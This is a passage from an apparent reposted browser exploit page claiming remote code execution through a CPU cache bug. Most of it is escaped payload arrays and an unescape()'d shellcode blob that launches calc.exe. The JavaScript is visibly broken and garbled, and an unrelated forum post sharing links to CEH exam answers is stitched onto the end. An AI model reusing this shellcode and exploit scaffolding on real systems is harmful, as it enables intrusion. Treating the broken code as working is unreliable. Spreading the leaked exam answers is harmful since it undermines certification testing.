"%u1F00%u0000%u2B00%u0000%u0500%u0000%u2600%u0000%u3E00%u0000%u0600%u0000"+ "%u0D00%u0000%u2500%u0000%u0700%u0000%u3000%u0000%u4000%u0000%u0800%u0000"+ "%u6B00%u0000%u8F00%u0000%u0900%u0000%uFA00%u0000%u1201%u0000%u0A00%u0000"+ "%uC901%u0000%uE101%u0000%u0B00%u0000%u0C00%u0000%u3C00%u0000%u0C00%u0000"+ "%u1700%u0000%u3300%u0000%u0D00%u0000%u0E00%u0000%u3600%u0000%u0E00%u0000"+ "%u1500%u0000%u4D00%u0000%u0F00%u0000%u6800%u0000%u8800%u0000%u1000%u0000"+ "%uD300%u0000%u1701%u0000%u1100%u0000%uF201%u0000%u3A02%u0000%u1200%u0000"+ "%uF103%u0000%u3904%u0000%u1300%u0000%uF407%u0000%u2408%u0000%u1400%u0000"+ "%uEF0F%u0000%u3B10%u0000%u1500%u0000%u961F%u0000%uCE1F%u0000%u1600%u0000"+ "%u1D00%u0000%u7500%u0000%u1700%u0000%u2000%u0000%u7000%u0000%u1800%u0000"+ "%u1B00%u0000%u7F00%u0000%u1900%u0000%u2A00%u0000%u6200%u0000%u1A00%u0000"+ "%u1900%u0000%u7100%u0000%u1B00%u0000%u3C00%u0000%u8C00%u0000%u1C00%u0000"+ "%uE700%u0000%u2301%u0000%u1D00%u0000%u9E01%u0000%uE601%u0000%u1E00%u0000"+ "%u2500%u0000%u9D00%u0000%u1F00%u0000%uD800%u0000%u1801%u0000%u2000%u0000"+ "%uA301%u0000%u2702%u0000%u2100%u0000%uE203%u0000%u6A04%u0000%u2200%u0000"+ "%uE107%u0000%u6908%u0000%u2300%u0000%uE40F%u0000%u7410%u0000%u2400%u0000"+ "%uFF1F%u0000%u4B20%u0000%u2500%u0000%uC63F%u0000%u1E40%u0000%u2600%u0000"+ "%uAD7F%u0000%u0580%u0000%u2700%u0000%uD0FF%u0000%u6000%u0100%u2800%u0000"+ "%uCBFF%u0100%u6F00%u0200%u2900%u0000%uDAFF%u0300%u7200%u0400%u2A00%u0000"+ "%u29FF%u0700%u81FF%u0700%u2B00%u0000%u2C00%u0000%u9C00%u0000%u2C00%u0000"+ "%u3700%u0000%u9300%u0000%u2D00%u0000%u2E00%u0000%u9600%u0000%u2E00%u0000"+ "%u3500%u0000%uED00%u0000%u2F00%u0000%u4800%u0000%uE800%u0000%u3000%u0000"+ "%u3300%u0000%uF700%u0000%u3100%u0000%u5200%u0000%uDA00%u0000%u3200%u0000"+ "%u1100%u0000%u9900%u0000%u3300%u0000%u1400%u0000%u8400%u0000%u3400%u0000"+ "%u0F00%u0000%u9B00%u0000%u3500%u0000%u3600%u0000%uEE00%u0000%u3600%u0000"+ "%u7D00%u0000%u1501%u0000%u3700%u0000%uC001%u0000%u5002%u0000%u3800%u0000"+ 
"%u3B03%u0000%uDF03%u0000%u3900%u0000%u4A00%u0000%uC200%u0000%u3A00%u0000"+ "%u3900%u0000%uD100%u0000%u3B00%u0000%u5C00%u0000%u2C01%u0000%u3C00%u0000"+ "%uC701%u0000%u4302%u0000%u3D00%u0000%u3E03%u0000%uC603%u0000%u3E00%u0000"+ "%u4500%u0000%u3D01%u0000%u3F00%u0000%uB801%u0000%u3802%u0000%u4000%u0000"+ "%u4303%u0000%u4704%u0000%u4100%u0000%uC207%u0000%uCA08%u0000%u4200%u0000"+ "%uC10F%u0000%uC910%u0000%u4300%u0000%uC41F%u0000%uD420%u0000%u4400%u0000"+ "%uDF3F%u0000%uEB40%u0000%u4500%u0000%uE67F%u0000%uFE80%u0000%u4600%u0000"+ "%uCDFF%u0000%uE500%u0100%u4700%u0000%uF0FF%u0100%u8000%u0200%u4800%u0000"+ "%uABFF%u0300%uCF00%u0400%u4900%u0000%uBAFF%u0700%uD200%u0800%u4A00%u0000"+ "%u89FF%u0F00%u2100%u1000%u4B00%u0000%u4CFF%u1F00%u7C00%u2000%u4C00%u0000"+ "%uD7FF%u3F00%uF300%u4000%u4D00%u0000%uCEFF%u7F00%uF600%u8000%u4E00%u0000"+ "%uD5FF%uFF00%u8D00%u0001%u4F00%u0000%uA8FF%uFF01%uC800%u0002%u5000%u0000"+ "%u93FF%uFF03%uD700%u0004%u5100%u0000%uB2FF%uFF07%uFA00%u0008%u5200%u0000"+ "%uB1FF%uFF0F%uF900%u0010%u5300%u0000%uB4FF%uFF1F%uE400%u0020%u5400%u0000"+ "%uAFFF%uFF3F%uFB00%u0040%u5500%u0000%u56FE%uFF7F%u0EFF%uFF7F%u5600%u0000"+ "%u5D00%u0000%u3501%u0000%u5700%u0000%u6000%u0000%u3001%u0000%u5800%u0000"+ "%u5B00%u0000%u3F01%u0000%u5900%u0000%u6A00%u0000%u2201%u0000%u5A00%u0000"+ "%u5900%u0000%u3101%u0000%u5B00%u0000%u7C00%u0000%uCC01%u0000%u5C00%u0000"+ "%uA700%u0000%uE301%u0000%u5D00%u0000%u5E00%u0000%u2601%u0000%u5E00%u0000"+ "%u6500%u0000%uDD01%u0000%u5F00%u0000%u9800%u0000%uD801%u0000%u6000%u0000"+ "%u6300%u0000%uE701%u0000%u6100%u0000%uA200%u0000%uAA01%u0000%u6200%u0000"+ "%u2100%u0000%u2901%u0000%u6300%u0000%u2400%u0000%u3401%u0000%u6400%u0000"+ "%u3F00%u0000%u0B01%u0000%u6500%u0000%u0600%u0000%u5E01%u0000%u6600%u0000"+ "%u6D00%u0000%uC501%u0000%u6700%u0000%u9000%u0000%uA001%u0000%u6800%u0000"+ "%u0B00%u0000%u2F01%u0000%u6900%u0000%u1A00%u0000%u3201%u0000%u6A00%u0000"+ "%u6900%u0000%uC101%u0000%u6B00%u0000%uEC00%u0000%u5C02%u0000%u6C00%u0000"+ 
"%uF703%u0000%u5305%u0000%u6D00%u0000%uEE07%u0000%u5609%u0000%u6E00%u0000"+ "%uF50F%u0000%u2D11%u0000%u6F00%u0000%u881F%u0000%uA820%u0000%u7000%u0000"+ "%u733E%u0000%uB73F%u0000%u7100%u0000%u9200%u0000%u9A01%u0000%u7200%u0000"+ "%u5100%u0000%uD901%u0000%u7300%u0000%uD400%u0000%u4402%u0000%u7400%u0000"+ "%uCF03%u0000%u5B05%u0000%u7500%u0000%uF607%u0000%u2E09%u0000%u7600%u0000"+ "%uBD0F%u0000%u5511%u0000%u7700%u0000%u801F%u0000%u9020%u0000%u7800%u0000"+ "%u7B3E%u0000%u9F3F%u0000%u7900%u0000%u8A00%u0000%u8201%u0000%u7A00%u0000"+ "%u7900%u0000%u9101%u0000%u7B00%u0000%u9C00%u0000%u6C02%u0000%u7C00%u0000"+ "%u8703%u0000%u8304%u0000%u7D00%u0000%u7E06%u0000%u8607%u0000%u7E00%u0000"+ "%u8500%u0000%u7D02%u0000%u7F00%u0000%u7803%u0000%u7804%u0000%u8000%u0000"+ "%u8306%u0000%u8708%u0000%u8100%u0000%u820F%u0000%u8A11%u0000%u8200%u0000"+ "%u811F%u0000%u8921%u0000%u8300%u0000%u843F%u0000%u9441%u0000%u8400%u0000"+ "%u9F7F%u0000%uAB81%u0000%u8500%u0000%uA6FF%u0000%uBE01%u0100%u8600%u0000"+ "%u8DFF%u0100%uA501%u0200%u8700%u0000%uB0FF%u0300%uC001%u0400%u8800%u0000"+ "%uEBFF%u0700%u0F01%u0800%u8900%u0000%u7AFF%u0F00%u9201%u1000%u8A00%u0000"+ "%u49FF%u1F00%u6100%u2000%u8B00%u0000%u8CFE%u3F00%uBC00%u4000%u8C00%u0000"+ "%u97FF%u7F00%uB301%u8000%u8D00%u0000%u8EFF%uFF00%uB601%u0001%u8E00%u0000"+ "%u95FF%uFF01%uCD01%u0002%u8F00%u0000%uE8FF%uFF03%u0801%u0004%u9000%u0000"+ "%u53FF%uFF07%u9701%u0008%u9100%u0000%u72FF%uFF0F%uBA01%u0010%u9200%u0000"+ "%u71FF%uFF1F%uB901%u0020%u9300%u0000%u74FF%uFF3F%uA401%u0040%u9400%u0000"+ "%u6FFF%uFF7F%uBB01%u0080%u9500%u0000%u16FF%uFFFF%u4E00%u0000%u9600%u0000"+ "%u9DFE%uFFFF%uF500%u0000%u9700%u0000%uA0FF%uFFFF%uF001%u0000%u9800%u0000"+ "%u9BFF%uFFFF%uFF01%u0000%u9900%u0000%uAAFF%uFFFF%uE201%u0000%u9A00%u0000"+ "%u99FF%uFFFF%uF101%u0000%u9B00%u0000%uBCFF%uFFFF%u0C01%u0000%u9C00%u0000"+ "%u67FF%uFFFF%uA301%u0000%u9D00%u0000%u1EFF%uFFFF%u6600%u0000%u9E00%u0000"+ "%uA5FE%uFFFF%u1D00%u0000%u9F00%u0000%u58FF%uFFFF%u9801%u0000%uA000%u0000"+ 
"%u23FF%uFFFF%uA701%u0000%uA100%u0000%u62FF%uFFFF%uEA01%u0000%uA200%u0000"+ "%u61FF%uFFFF%uE901%u0000%uA300%u0000%u64FF%uFFFF%uF401%u0000%uA400%u0000"+ "%u7FFF%uFFFF%uCB01%u0000%uA500%u0000%u46FF%uFFFF%u9E01%u0000%uA600%u0000"+ "%u2DFF%uFFFF%u8501%u0000%uA700%u0000%u50FF%uFFFF%uE001%u0000%uA800%u0000"+ "%u4BFF%uFFFF%uEF01%u0000%uA900%u0000%u5AFF%uFFFF%uF201%u0000%uAA00%u0000"+ "%uA9FC%uFFFF%u01FE%uFFFF%uAB00%u0000%uAC00%u0000%u1C02%u0000%uAC00%u0000"+ "%uB700%u0000%u1302%u0000%uAD00%u0000%uAE00%u0000%u1602%u0000%uAE00%u0000"+ "%uB500%u0000%u6D02%u0000%uAF00%u0000%uC800%u0000%u6802%u0000%uB000%u0000"+ "%uB300%u0000%u7702%u0000%uB100%u0000%uD200%u0000%u5A02%u0000%uB200%u0000"+ "%u9100%u0000%u1902%u0000%uB300%u0000%u9400%u0000%u0402%u0000%uB400%u0000"+ "%u8F00%u0000%u1B02%u0000%uB500%u0000%uB600%u0000%u6E02%u0000%uB600%u0000"+ "%uFD00%u0000%u9503%u0000%uB700%u0000%u4001%u0000%uD003%u0000%uB800%u0000"+ "%uBB00%u0000%u5F02%u0000%uB900%u0000%uCA00%u0000%u4202%u0000%uBA00%u0000"+ "%uB900%u0000%u5102%u0000%uBB00%u0000%uDC00%u0000%uAC03%u0000%uBC00%u0000"+ "%u4701%u0000%uC303%u0000%uBD00%u0000%uBE00%u0000%u4602%u0000%uBE00%u0000"+ "%uC500%u0000%uBD03%u0000%uBF00%u0000%u3801%u0000%uB803%u0000%uC000%u0000"+ "%uC300%u0000%uC703%u0000%uC100%u0000%u4201%u0000%u4A03%u0000%uC200%u0000"+ "%u4100%u0000%u4902%u0000%uC300%u0000%u4400%u0000%u5402%u0000%uC400%u0000"+ "%u5F00%u0000%u6B02%u0000%uC500%u0000%u6600%u0000%u7E02%u0000%uC600%u0000"+ "%u4D00%u0000%u6502%u0000%uC700%u0000%u7000%u0000%u0002%u0000%uC800%u0000"+ "%u2B00%u0000%u4F02%u0000%uC900%u0000%u3A00%u0000%u5202%u0000%uCA00%u0000"+ "%u0900%u0000%uA102%u0000%uCB00%u0000%uCC00%u0000%uFC03%u0000%uCC00%u0000"+ "%u5701%u0000%u7303%u0000%uCD00%u0000%u4E00%u0000%u7602%u0000%uCE00%u0000"+ "%u5500%u0000%u0D02%u0000%uCF00%u0000%u2800%u0000%u4802%u0000%uD000%u0000"+ "%u1300%u0000%u5702%u0000%uD100%u0000%u3200%u0000%u7A02%u0000%uD200%u0000"+ "%u3100%u0000%u7902%u0000%uD300%u0000%u3400%u0000%u6402%u0000%uD400%u0000"+ 
"%u2F00%u0000%u7B02%u0000%uD500%u0000%uD600%u0000%u8E03%u0000%uD600%u0000"+ "%uDD01%u0000%uB504%u0000%uD700%u0000%uE007%u0000%uB00A%u0000%uD800%u0000"+ "%uDB0F%u0000%uBF12%u0000%uD900%u0000%uEA1F%u0000%uA222%u0000%uDA00%u0000"+ "%uD93F%u0000%uB142%u0000%uDB00%u0000%uFC7F%u0000%u4C82%u0000%uDC00%u0000"+ "%u27FF%u0000%u6301%u0100%uDD00%u0000%uDEFC%u0100%uA6FF%u0100%uDE00%u0000"+ "%uE501%u0000%u5D04%u0000%uDF00%u0000%u1807%u0000%u5809%u0000%uE000%u0000"+ "%uE30C%u0000%u670F%u0000%uE100%u0000%u2201%u0000%u2A03%u0000%uE200%u0000"+ "%uA100%u0000%uA903%u0000%uE300%u0000%uA401%u0000%uB404%u0000%uE400%u0000"+ "%uBF07%u0000%u8B0A%u0000%uE500%u0000%u860F%u0000%uDE12%u0000%uE600%u0000"+ "%uED1F%u0000%u4522%u0000%uE700%u0000%u103F%u0000%u2041%u0000%uE800%u0000"+ "%u8B7C%u0000%uAF7F%u0000%uE900%u0000%u9A01%u0000%uB204%u0000%uEA00%u0000"+ "%uE907%u0000%u410A%u0000%uEB00%u0000%u6C0F%u0000%uDC12%u0000%uEC00%u0000"+ "%u771F%u0000%uD322%u0000%uED00%u0000%u6E3F%u0000%uD642%u0000%uEE00%u0000"+ "%u757F%u0000%uAD82%u0000%uEF00%u0000%u08FF%u0000%u2801%u0100%uF000%u0000"+ "%uF3FC%u0100%u37FF%u0100%uF100%u0000%u1201%u0000%u1A03%u0000%uF200%u0000"+ "%uD100%u0000%u5903%u0000%uF300%u0000%u5401%u0000%uC404%u0000%uF400%u0000"+ "%u4F07%u0000%uDB0A%u0000%uF500%u0000%u760F%u0000%uAE12%u0000%uF600%u0000"+ "%u3D1F%u0000%uD522%u0000%uF700%u0000%u003F%u0000%u1041%u0000%uF800%u0000"+ "%uFB7C%u0000%u1F7F%u0000%uF900%u0000%u0A01%u0000%u0203%u0000%uFA00%u0000"+ "%uF900%u0000%u1103%u0000%uFB00%u0000%u1C01%u0000%uEC04%u0000%uFC00%u0000"+ "%u0707%u0000%u0309%u0000%uFD00%u0000%uFE0C%u0000%u060F%u0000%uFE00%u0000"+ "%u0501%u0000%uFD04%u0000%uFF00%u0000%uF806%u0000%uF808%u0000%u0001%u0000"; unescape(evilcode); } /* // THREATED IMPLEMENTATION function init(){ document.write("<p>[!] Exploit Running</p><br>"); document.write("[+] Loading micro-program"); microcode_vm(); var a, id, handle; var size = 111; document.write("initializing XX thread..."); for (a=1; a < N_CORE; a++){ //code should be written for debug. 
} } */ function vm_engine() { var a, dw, f1, f2, f3, fn, f0 = -1, dt = 0; for({ microcode_vm(); f1; unescape = (p + ((dt++) % n)); f2 = (p + ((dt++) % n)); f3 = (p + ((dt++) % n)); // vm + scrambler + dynamic encoder + multi-pass obfuscator fn = -1 ^ (f1 ^ f2) + ((dt + f1) ^ f2) ^ f0; // a few minutes to trigger this condition on 2.4 MHz PC if ( ((f1 ^ f2) == 0) || (f1 ^ f2 ^ f3) == 0) { // a sync problem. it would be better to use locks over here. // crash happens. crash is not shit. crash means code works. // so, should be really care about the addr and the content? // it works for Intel Core 2 Duo T5750. o_o 5 ~ 10 minutes of // it gives BSOD on Intel Atom N270 cpu o_o less than an hour f3 = test(result); f1 = unescape("%u9090%u9090") ^ f0 + // Shellcode Calculator unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"+ "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); f2 = test ^ fn; document.write("<br><br>w00t! w00t! 
u g0t r00t ?!<br>"); } (p + (f3 % n)) = fn; f0 = fn; /* f0 = fn ^ dt */ ; } } function demo() { var n; document.write("HITB 2008 missing exploit :=) by Selena<br><br>"); document.write("micro-code is written by Selena<br>"); document.write("virtual machine is designed by Selena<br>"); document.write("virtual machine is designed by Selena<br>"); document.write("virtual machine has been rewritten by nezumi<br><br>"); document.write("exploit PoC rewritten by S4(uR4 for remote atack demo 2012<br><br>"); //setTimeout(9000); document.write("[!]<b> Exploit Running"); vm_engine(); //if (n == 0) { init_t();} ; //if(result != 0){ document.write("<br><b>[+] Done!"); //} } </script> <h1>CPU cache controller bug exploit Remote code exec mod</h1> <button onClick="ThreadProc_dbg(bug)";><b>• Check vuln</b> »</button> <button onClick="demo()";><b>PoC Run!</b> ?</button> </body> # 1337day.com [2012-07-13]
  20. The CEH v5 and v7 exam. v5 link: http://www.depotware-network.net/Partage/CEH/examen/cehv5.html v7 link: http://www.depotware-network.net/Partage/CEH/examen/cehv7.pdf (+ answers) And so I don't have to open another topic, I'm also putting the CEH v6 materials here: http://art-exhibition.sustech.edu/lectures/CEH/